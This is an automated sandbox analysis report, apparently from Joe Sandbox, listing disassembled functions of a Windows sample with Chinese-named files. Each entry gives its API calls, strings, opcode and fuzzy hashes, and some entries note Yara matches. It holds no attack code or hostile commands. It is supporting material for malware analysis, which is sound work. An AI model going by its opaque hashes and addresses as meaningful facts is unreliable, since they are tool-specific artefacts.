                                      • Part of subcall function 004BC228: InterlockedIncrement.KERNEL32(-000000F4), ref: 004BC23D
                                    • FindFirstFileA.KERNEL32(?,?,*.*), ref: 0041D32A
                                      • Part of subcall function 004B9825: __EH_prolog.LIBCMT ref: 004B982A
                                      • Part of subcall function 004BC4B3: InterlockedDecrement.KERNEL32 ref: 004BC4C7
                                    • SendMessageA.USER32 ref: 0041D3D0
                                    • FindNextFileA.KERNEL32(?,00000010), ref: 0041D3DC
                                    • FindClose.KERNEL32(?), ref: 0041D3EF
                                    • SendMessageA.USER32(?,00001102,00000002,?), ref: 0041D401
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Find$FileInterlockedMessageSend$CloseDecrementFirstH_prologIncrementNext
                                    • String ID: *.*
                                    • API String ID: 2486832813-438819550
                                    • Opcode ID: e180d1b8cf44e7d89929ee93b10e560846ea1109bdef9d4eedc6711de0d9e341
                                    • Instruction ID: 263135029c80566dbc8d0e13695211a3324c1c9bff9d877f597de71889518e27
                                    • Opcode Fuzzy Hash: e180d1b8cf44e7d89929ee93b10e560846ea1109bdef9d4eedc6711de0d9e341
                                    • Instruction Fuzzy Hash: C84192B1504345ABC310DF65CC81FEBB7E8BB84714F00491EF9A583290EB78E904CB66
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: wsprintf$ClassInfo
                                    • String ID: Afx:%x:%x$Afx:%x:%x:%x:%x:%x
                                    • API String ID: 845911565-79760390
                                    • Opcode ID: 3d3163c70ec9e2d5b18857a7fa963f8d6c7db1aebf4b57d55346d88e14b94b2b
                                    • Instruction ID: d5ff54e9d27c398d2ce7c129265375da3ebdf1d2244de130377acf911183bc18
                                    • Opcode Fuzzy Hash: 3d3163c70ec9e2d5b18857a7fa963f8d6c7db1aebf4b57d55346d88e14b94b2b
                                    • Instruction Fuzzy Hash: 4C21FC71901209AB9F50DF9ADC81DEF7BB8FE98754B00402AF905A2241D7349A519BB9
                                    APIs
                                      • Part of subcall function 004B1DB4: RtlInitializeCriticalSection.NTDLL(00000000), ref: 004B1DF1
                                      • Part of subcall function 004B1DB4: RtlEnterCriticalSection.NTDLL(?), ref: 004B1E0C
                                      • Part of subcall function 004B1E15: RtlLeaveCriticalSection.NTDLL ref: 004B1E22
                                    • GetTimeZoneInformation.KERNEL32(0000000C,?,?,?,0000000B,0000000B,?,004B671D,004B6316,?,00000000,?,?,004AD02E,?,?), ref: 004B677A
                                    • WideCharToMultiByte.KERNEL32(00000220,006148F4,000000FF,0000003F,00000000,?,?,004B671D,004B6316,?,00000000,?,?,004AD02E,?,?), ref: 004B6810
                                    • WideCharToMultiByte.KERNEL32(00000220,00614948,000000FF,0000003F,00000000,?,?,004B671D,004B6316,?,00000000,?,?,004AD02E,?,?), ref: 004B6849
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: CriticalSection$ByteCharMultiWide$EnterInformationInitializeLeaveTimeZone
                                    • String ID: <.]
                                    • API String ID: 3442286286-3438141827
                                    • Opcode ID: 4e53ed035e6fe4db62bb413b9967af770cbc67fad550f25f64bded44bb6ebb5f
                                    • Instruction ID: be34a6cc37878a6766a53a41076f187ae9116dd609c98f9ac59cab5cfb3ab2af
                                    • Opcode Fuzzy Hash: 4e53ed035e6fe4db62bb413b9967af770cbc67fad550f25f64bded44bb6ebb5f
                                    • Instruction Fuzzy Hash: C6612BB04051419FDB31AF29EC41BA63FEAFB62314F19012FE095872A1D77C4846E76E
                                    APIs
                                    • GetClassInfoA.USER32(?,WTWindow,00000000), ref: 0042E658
                                    • LoadCursorA.USER32(00000000,00007F00), ref: 0042E669
                                    • GetStockObject.GDI32(00000005), ref: 0042E673
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: ClassCursorInfoLoadObjectStock
                                    • String ID: WTWindow
                                    • API String ID: 1762135420-3503404378
                                    • Opcode ID: 6adaf1f8adf85eb175fbe6acc33c7eb00d382c1d9563ec511b6d853a4276c666
                                    • Instruction ID: f4ba6682dfd8f5ad4cba96e07761c65ad9692d3cbbad70b45517f9e3123342ae
                                    • Opcode Fuzzy Hash: 6adaf1f8adf85eb175fbe6acc33c7eb00d382c1d9563ec511b6d853a4276c666
                                    • Instruction Fuzzy Hash: 8D117CB1A09311AFC350DF57AC84A5BFBE8FB98754F84083EF88893210D73899448B5A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: AfxControlBar42s$AfxFrameOrView42s$AfxMDIFrame42s$AfxOleControl42s$AfxWnd42s
                                    • API String ID: 0-1092042744
                                    • Opcode ID: fb5b2faf3c2fcfd18b5ce3b7ac760a4fe2275387eaba7b73f1f5d903facf6f83
                                    • Instruction ID: 1da97fe84944b0a8e945f8e8d7c9e16e454fa52b0d9c3da1dacc9da900fe8439
                                    • Opcode Fuzzy Hash: fb5b2faf3c2fcfd18b5ce3b7ac760a4fe2275387eaba7b73f1f5d903facf6f83
                                    • Instruction Fuzzy Hash: 0A81237AD00259AEDBA0DF95C585FDEBFE8AB04344F10816EF904E6181D7788A44CB98
                                    APIs
                                    • FindNextFileA.KERNEL32(?,?), ref: 0042B072
                                    • FindClose.KERNEL32 ref: 0042B081
                                    • FindFirstFileA.KERNEL32(?,?), ref: 0042B08D
                                    • FindClose.KERNEL32(00000000), ref: 0042B0EB
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Similarity
                                    • API ID: Find$CloseFile$FirstNext
                                    • String ID:
                                    • API String ID: 1164774033-0
                                    • Opcode ID: 5cdbea6ef84060144afec20f40a73e13199665e1d8441fddcb221526cdc6777c
                                    • Instruction ID: adb7949c462eb89cf48e75d5b2c342d4e3f05df1d5ce6b8b1a625b256016cbdd
                                    • Opcode Fuzzy Hash: 5cdbea6ef84060144afec20f40a73e13199665e1d8441fddcb221526cdc6777c
                                    • Instruction Fuzzy Hash: FD21E8327047358BD3338A25A8447BBB394EB85724F95462ADD3587390EB3DDC4582CA
                                    APIs
                                    • GetLocalTime.KERNEL32(?), ref: 004ACF6D
                                    • GetSystemTime.KERNEL32(?), ref: 004ACF77
                                    • GetTimeZoneInformation.KERNEL32(?), ref: 004ACFCC
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Similarity
                                    • API ID: Time$InformationLocalSystemZone
                                    • String ID:
                                    • API String ID: 2475273158-0
                                    • Opcode ID: aed284b3cc6979be57d832161101ed1755b0523e8b550270f5995699088938c3
                                    • Instruction ID: 21692d648d8bd6a54fe17b39514a695996ccb0f0eab3cee525ef4427b06728cd
                                    • Opcode Fuzzy Hash: aed284b3cc6979be57d832161101ed1755b0523e8b550270f5995699088938c3
                                    • Instruction Fuzzy Hash: CF21B07A900009E9CFA0AF98D844AFF77BAAB16715F444513F810E25E4E7388D82D7A8
                                    APIs
                                    • GetKeyState.USER32(00000011), ref: 004336E1
                                    • GetKeyState.USER32(00000010), ref: 004336F6
                                    • GetKeyState.USER32(00000012), ref: 0043370B
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Similarity
                                    • API ID: State
                                    • String ID:
                                    • API String ID: 1649606143-0
                                    • Opcode ID: 6344f1bab86d7d499fc22d0e91c470b055b31e92c6fef73befb1b9e719a37a10
                                    • Instruction ID: 2a1ecde81c7ec4b49f438093cb83609cd4c2892025d2c29521775e66aae8aebb
                                    • Opcode Fuzzy Hash: 6344f1bab86d7d499fc22d0e91c470b055b31e92c6fef73befb1b9e719a37a10
                                    • Instruction Fuzzy Hash: 510126DFD001652AEF341E65A909BF645410708B53F55A033C90D3B3D0974C0E8A23AE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: ExchangeInterlocked
                                    • String ID: x$z${
                                    • API String ID: 367298776-1334427886
                                    • Opcode ID: 518b07cac4c6f36476c1c67daaaaa543ef6772b5266a017a9aaa299c66b33734
                                    • Instruction ID: 96c843df5b01ffe00201c1fc0585832960238461ca356d9eb6d17a96a97673af
                                    • Opcode Fuzzy Hash: 518b07cac4c6f36476c1c67daaaaa543ef6772b5266a017a9aaa299c66b33734
                                    • Instruction Fuzzy Hash: 8B625FB1D00119DFCF14CF9AC981AAEB7B6EF94304F64826AE419A7380D7349A59CF91
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 16775bfd5a3ae423afd537c71043936eb0420267c6721a57d0081ac1be912458
                                    • Instruction ID: b49cf7f59c066e05df4e31f3c9b16d169fc45c1287d8167037eb9d0ae4ba6baf
                                    • Opcode Fuzzy Hash: 16775bfd5a3ae423afd537c71043936eb0420267c6721a57d0081ac1be912458
                                    • Instruction Fuzzy Hash: EFF04F31500109BBCF015F61CC089AE7FA9BF26354B24C026F806D5161DB38DE96DB59
                                    Strings
                                    • known incorrect sRGB profile, xrefs: 00454F6E
                                    • out-of-date sRGB profile with no signature, xrefs: 00454F86
                                    • copyright violation: edited ICC profile ignored, xrefs: 00454F27
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Similarity
                                    • API ID:
                                    • String ID: copyright violation: edited ICC profile ignored$known incorrect sRGB profile$out-of-date sRGB profile with no signature
                                    • API String ID: 0-1307623137
                                    • Opcode ID: e661e9a12c3015677a6cae10271151397bad33302d99bfe9cb97a8195a296cdb
                                    • Instruction ID: 1fc8f86739117a4990dd67df882cfccada23379f083427f40dd39fa0c4c51d77
                                    • Opcode Fuzzy Hash: e661e9a12c3015677a6cae10271151397bad33302d99bfe9cb97a8195a296cdb
                                    • Instruction Fuzzy Hash: 3251F8B270879107DB28CE394C51767BBE35BD5309F09986DE4D9CB342E524D509C754
                                    APIs
                                    • ioctlsocket.WS2_32(?,4004667F,?), ref: 0043E842
                                    • recvfrom.WS2_32(00000000,00000000,?,00000000,00000000,00000000), ref: 0043E890
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Similarity
                                    • API ID: ioctlsocketrecvfrom
                                    • String ID:
                                    • API String ID: 217199969-0
                                    • Opcode ID: 0cf103955d4178ba78a1e03da9a319beddda152bb23b160249005a05bd6b76ca
                                    • Instruction ID: 60d1552222b3cc75efc616f7b96f6fd96c91d10a5a022f67f5e7dc17b423705f
                                    • Opcode Fuzzy Hash: 0cf103955d4178ba78a1e03da9a319beddda152bb23b160249005a05bd6b76ca
                                    • Instruction Fuzzy Hash: BF215170605601ABD318EF25C955F6BB7E4AB98724F108B2EF09AC32D0D778DC45CB5A
                                    APIs
                                    • GetVersion.KERNEL32(?,004C6CFC,005BDEE8,004C60AC,00000010,00000000,00000100,005BDEE8,?,?,004C5A93,004C5AF6,004C5377,004C1DA3,00000100,004C1D3C), ref: 004C6C6C
                                    • RtlInitializeCriticalSection.NTDLL(00614470), ref: 004C6C91
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Similarity
                                    • API ID: CriticalInitializeSectionVersion
                                    • String ID:
                                    • API String ID: 385228656-0
                                    • Opcode ID: fd420175d937f1213ac15c1cc57802f910c9da9852adc28f7a71da19d73a5846
                                    • Instruction ID: c5177978bdfb8c80f9bd1b793fd9c4f8ea1d3977fde55b36c6a81220e3269119
                                    • Opcode Fuzzy Hash: fd420175d937f1213ac15c1cc57802f910c9da9852adc28f7a71da19d73a5846
                                    • Instruction Fuzzy Hash: 68E0E6B4481210A7E3A15F14FD04FD537A3F71E71FF59902BE58646164CFB8644186DC
                                    APIs
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00433510
                                    • FindClose.KERNEL32(00000000), ref: 0043351C
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Similarity
                                    • API ID: Find$CloseFileFirst
                                    • String ID:
                                    • API String ID: 2295610775-0
                                    • Opcode ID: 60385712d254f65724af7c97080f05b1d10d531a49dcf9ca43deb725226e6401
                                    • Instruction ID: 461013a3db1cce88a7919f48674d83daf3f644474f9bca53d57dcfb8c7ce60fa
                                    • Opcode Fuzzy Hash: 60385712d254f65724af7c97080f05b1d10d531a49dcf9ca43deb725226e6401
                                    • Instruction Fuzzy Hash: 0AD0A7B8C002416BD3119F75DD08ABA3259A74C321FC40A38BD2DC12F0F63EC9588567
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Similarity
                                    • API ID:
                                    • String ID: MTrk$d
                                    • API String ID: 0-4044675371
                                    • Opcode ID: a0e75f79ab4b39e11bcc3c33668d8f89fe061cc056b73e4a3c471ca4ce6b0880
                                    • Instruction ID: 3a687d183b7353a186c28e5fd2b2a7b0be60239ce42140adb1f641ca3cbc2cab
                                    • Opcode Fuzzy Hash: a0e75f79ab4b39e11bcc3c33668d8f89fe061cc056b73e4a3c471ca4ce6b0880
                                    • Instruction Fuzzy Hash: 25919171B006059FD718DF29D8C196AB7E2EFC8304F14993EE84ACB345DA39E905CB59
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 73a90cc2ea03b15300d6b4bfa94f26eb780ab8f9b1d68e9028b3679348836136
                                    • Instruction ID: 47ffe90eae9be606585cff3e524e47c4447ecf42eda219c528cab9c548bc3f82
                                    • Opcode Fuzzy Hash: 73a90cc2ea03b15300d6b4bfa94f26eb780ab8f9b1d68e9028b3679348836136
                                    • Instruction Fuzzy Hash: 0732A471E00606DFDB14DFA9C881AEEB7B1BF5C314F24516AE406AB381D738AD41CB99
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Iconic
                                    • String ID:
                                    • API String ID: 110040809-0
                                    • Opcode ID: 73fe98bbb4559f5d035be22fd8d979ff72324a0c125437ffc4360da54098be33
                                    • Instruction ID: bb1f7addb7f198911c1651ad9b6496061b7699192bd202d1273e17d09e5b5bf7
                                    • Opcode Fuzzy Hash: 73fe98bbb4559f5d035be22fd8d979ff72324a0c125437ffc4360da54098be33
                                    • Instruction Fuzzy Hash: 9161BB76210711CBD314CF2CD480B8AB7E5FBA9300F50886EE59ACB350C3B6E895CBA5
                                    APIs
                                    • GetClassInfoA.USER32(?,?,?), ref: 004343C8
                                      • Part of subcall function 004BEA56: __EH_prolog.LIBCMT ref: 004BEA5B
                                      • Part of subcall function 004BEA56: GetClassInfoA.USER32(?,?,?), ref: 004BEA76
                                      • Part of subcall function 004BEA56: RegisterClassA.USER32(00000004), ref: 004BEA81
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Class$Info$H_prologRegister
                                    • String ID:
                                    • API String ID: 1678024082-0
                                    • Opcode ID: 973009e2e3370d31d8f964122859b548e6e22fa6b3ff83cddecd3006831dd548
                                    • Instruction ID: c2cbe502dff698237c6f2c2fd6c8703168e2d51fb39b9175b716e2577d497cb9
                                    • Opcode Fuzzy Hash: 973009e2e3370d31d8f964122859b548e6e22fa6b3ff83cddecd3006831dd548
                                    • Instruction Fuzzy Hash: AA017275909311AF8344DF1AD48095BBBF5FEC8654F40892EF49893320E73499458F96
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5e949badd84716eb15f9ded434582a5adab5a290ac848caa5c1ea567d17e115a
                                    • Instruction ID: cc56981afbbe35796e05a25c63102d03ea9b317b5b1e1d30e14589d9748335cf
                                    • Opcode Fuzzy Hash: 5e949badd84716eb15f9ded434582a5adab5a290ac848caa5c1ea567d17e115a
                                    • Instruction Fuzzy Hash: A552C9767447094BD308CE9ACC9159EF3E3ABC8304F498A3CE955C3346EEB8ED1A8655
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7b4465b00c6dc1b81f72a93c055a9f79d6d0a72c526d12a2f377c6e95150c597
                                    • Instruction ID: 53d3127b306b8a6bc0e3889d23142d04071472a4c6ab36e2c5814b58131d9739
                                    • Opcode Fuzzy Hash: 7b4465b00c6dc1b81f72a93c055a9f79d6d0a72c526d12a2f377c6e95150c597
                                    • Instruction Fuzzy Hash: E7C1FF32A087854FD724CE09C0613ABB7E2AFC9712F98A51FE18147352D33C9E49CB5A
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
                                    • Instruction ID: 36b0ba2eb4d864158ff65f3020a0cb7b8063780970525320d47dcf72171fc774
                                    • Opcode Fuzzy Hash: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
                                    • Instruction Fuzzy Hash: 19B18C75A0020ADFDB15CF05C5D0AE9BBA1BF48319F24C19ED85A5B382C775EE46CBA0
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0377a3386d826d769c74f12b438f1f52deb1ae4eaf9644a1f8c93ba4f915ea8e
                                    • Instruction ID: 2b4ddd9a7bb9e13686c84c9944c20e956da4f234f17c3513d74d6e5086fbc979
                                    • Opcode Fuzzy Hash: 0377a3386d826d769c74f12b438f1f52deb1ae4eaf9644a1f8c93ba4f915ea8e
                                    • Instruction Fuzzy Hash: 95713B74E0414A9BDB09CFA9C4907BFBBB2FF8D304F18C46AD959AB345D6749942CB80
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0b4f27dd10139f30faea009d98bf7d04ad43b169fe1efa635cf320682f8d45aa
                                    • Instruction ID: ee63e5a65b8b86b81725176535607248a3982b061facca3f338870406173f4a8
                                    • Opcode Fuzzy Hash: 0b4f27dd10139f30faea009d98bf7d04ad43b169fe1efa635cf320682f8d45aa
                                    • Instruction Fuzzy Hash: 9C312D3374598203F71DCA2F9CA52FAEAD34FC522872DD87E99C98B357ECBA44168104
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: efa6c8adb8d99e167c9c970cc0212a6f9476c7cb66ca85f846bdfc1e0c1e939b
                                    • Instruction ID: 23b4e67384f28e8b30f96670869e2db9d30ba43fb0913c5e72c92879c4d65a07
                                    • Opcode Fuzzy Hash: efa6c8adb8d99e167c9c970cc0212a6f9476c7cb66ca85f846bdfc1e0c1e939b
                                    • Instruction Fuzzy Hash: D831CB227B609207D368DEBDAC80137B7939BCB346B6CC67DE545C770AC539D80B5214
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3a2c9fad27117a561ceaab87b4707d0754455d98b51ee7d1d5a925d83eec46f5
                                    • Instruction ID: f133c61ae22f8c9fda49b925379d7c90247f82b50c4ae2ca149305253c54abec
                                    • Opcode Fuzzy Hash: 3a2c9fad27117a561ceaab87b4707d0754455d98b51ee7d1d5a925d83eec46f5
                                    • Instruction Fuzzy Hash: 17D15BB2704605AFD304DFA8E8C4DABB7A9FB88365B10893AF541C7251C735EC51CBA4
                                    APIs
                                      • Part of subcall function 004C2FE4: __EH_prolog.LIBCMT ref: 004C2FE9
                                      • Part of subcall function 004C2FE4: BeginPaint.USER32(?,?,?,?,00417549), ref: 004C3012
                                      • Part of subcall function 004C2B95: GetClipBox.GDI32(?,?), ref: 004C2B9C
                                    • IsRectEmpty.USER32(?), ref: 0041A775
                                    • GetCurrentObject.GDI32(?,00000002), ref: 0041A7BA
                                    • GetCurrentObject.GDI32(?,00000001), ref: 0041A7CD
                                    • GetClientRect.USER32 ref: 0041A852
                                    • CreatePen.GDI32(-00000003,00000000,?), ref: 0041A86E
                                    • PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 0041A932
                                      • Part of subcall function 004C3056: __EH_prolog.LIBCMT ref: 004C305B
                                      • Part of subcall function 004C3056: EndPaint.USER32(?,?,?,?,004175C3), ref: 004C3078
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: CurrentH_prologObjectPaintRect$BeginClientClipCreateEmpty
                                    • String ID: gfff$pTL$vTL$|TL
                                    • API String ID: 3506841274-3558621277
                                    • Opcode ID: e0457c01183d502e1511cf170c366c0144e8a390d80a7a598b73ff7f0f35e907
                                    • Instruction ID: ec453efbd4b2f3ef8eb47c87bb2b7d1420d8012849b51fd9a1779ea96d3937a6
                                    • Opcode Fuzzy Hash: e0457c01183d502e1511cf170c366c0144e8a390d80a7a598b73ff7f0f35e907
                                    • Instruction Fuzzy Hash: 32E18BB55083409FC354DF59C884EAFB7E9EB88714F144A1EF59683280DB38E949CB6B
                                    APIs
                                    • GetFocus.USER32 ref: 0042A45F
                                    • GetWindowRect.USER32(?,?), ref: 0042A4B6
                                    • GetParent.USER32(?), ref: 0042A4C6
                                    • GetParent.USER32(?), ref: 0042A4F9
                                    • GlobalSize.KERNEL32(00000000), ref: 0042A543
                                    • GlobalFix.KERNEL32(00000000), ref: 0042A54B
                                    • IsWindow.USER32(?), ref: 0042A564
                                    • GetTopWindow.USER32(?), ref: 0042A5A1
                                    • GetWindow.USER32(00000000,00000002), ref: 0042A5BA
                                    • SetParent.USER32(?,?), ref: 0042A5E6
                                    • SendMessageA.USER32(?,0000806F,00000000,00000000), ref: 0042A631
                                    • SendMessageA.USER32(?,00008076,00000000,00000000), ref: 0042A640
                                    • GetParent.USER32(?), ref: 0042A653
                                    • SendMessageA.USER32(?,00008004,00000000,00000000), ref: 0042A66C
                                    • GetWindowLongA.USER32(?,000000F0), ref: 0042A674
                                    • SendMessageA.USER32(?,0000130B,00000000,00000000), ref: 0042A6A4
                                    • SendMessageA.USER32(?,0000130C,00000000,00000000), ref: 0042A6B2
                                    • IsWindow.USER32(?), ref: 0042A6FE
                                    • GetFocus.USER32 ref: 0042A708
                                    • SetFocus.USER32(?,00000000), ref: 0042A720
                                    • GlobalUnWire.KERNEL32(00000000), ref: 0042A72B
                                    • GlobalFree.KERNEL32(00000000), ref: 0042A732
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Window$MessageSend$GlobalParent$Focus$FreeLongRectSizeWire
                                    • String ID:
                                    • API String ID: 3944666249-0
                                    • Opcode ID: 512df11bb18cd49c2bc0d83a3e94727cf1e86d71ce0b77e9144659acf81bc464
                                    • Instruction ID: a8e474333442983c95dbe7bd0e93462c0301ff81be8674433f3e7812319536fa
                                    • Opcode Fuzzy Hash: 512df11bb18cd49c2bc0d83a3e94727cf1e86d71ce0b77e9144659acf81bc464
                                    • Instruction Fuzzy Hash: D6A14871704300AFD764EF65DC84F2BB7E9BB88704F50892EF9418B291DB78E8058B5A
                                    APIs
                                    • SetWindowRgn.USER32(?,00000000,00000001), ref: 0042FCF1
                                    • GetWindowRect.USER32(?,?), ref: 0042FD1E
                                    • BeginPath.GDI32(?), ref: 0042FDA7
                                    • MulDiv.KERNEL32(7FFF0000,?,00007FFF), ref: 0042FDC0
                                    • MulDiv.KERNEL32(00000000,?,00007FFF), ref: 0042FDCF
